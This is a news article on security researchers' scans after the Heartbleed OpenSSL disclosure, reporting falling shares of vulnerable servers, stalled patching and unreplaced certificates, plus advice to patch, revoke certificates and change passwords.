Security researcher and Opera developer Yngve Nysaeter Pettersen released a blog post Wednesday discussing the implications of quick reaction to patch the Heartbleed vulnerability. Rather than best practices and critical thinking prevailing, patches may have been installed that infected previously unaffected servers.
Pettersen said, “It is difficult to definitely say why this problem developed, but one possibility is that all the media attention led concerned system administrators into believing their system was unsecure. This, perhaps combined with administrative pressure and a need to ‘do something’, led them to upgrade an unaffected server to a newer, but still buggy version of the system, perhaps because the system variant had not yet been officially patched.”
A few weeks ago the Heartbleed vulnerability that allows sensitive information such as private encryption keys and passwords to be extracted from supposedly secure OpenSSL servers was discovered. A flurry of activity and media attention followed.
Using a Transport Layer Security (TLS) Prober, Pettersen has scanned about 500,000 servers.
“In the six scans I have made since April 11, the number of vulnerable servers have trended sharply downward, from 5.36 percent of all servers, to 2.33 percent this week. About 20 percent of the scanned servers support the Heartbeat TLS Extension, indicating that up to 75 percent of the affected servers had been patched before my first scan 4 days after the disclosure,” Pettersen said in a blog post.
Another security researcher, Robert Graham of Errata Security, had similar findings. He estimates there were 318,239 Heartbleed vulnerable systems, down from 600,000 a month ago.
“However, while the vulnerability number had been halved, to 2.77 percent, after 2 weeks, in the most recent scan, 2 weeks later, the number has only been reduced to 2.33 percent, indicating that patching of vulnerable servers has almost completely stopped,” Pettersen said.
While this may indicate most sites have been patched, only 30 percent of vulnerable sites are using a certificate issued by a Certificate Authority that is recognized by browsers. Petterson estimates the remaining vulnerability by saying, “In fact, assuming that all servers supporting heartbeat in the first scan were vulnerable, then 2/3 of the certificates have not been replaced after patching the vulnerable servers (as the certificates of the patched servers have been observed in previous scans).”
His recommendation is to “get the servers patched, certificates updated and revoked, passwords changed (in that sequence).”